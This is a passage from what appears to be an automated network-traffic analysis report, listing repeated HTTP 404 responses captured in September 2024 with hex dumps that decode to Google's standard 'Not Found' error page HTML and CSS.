70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 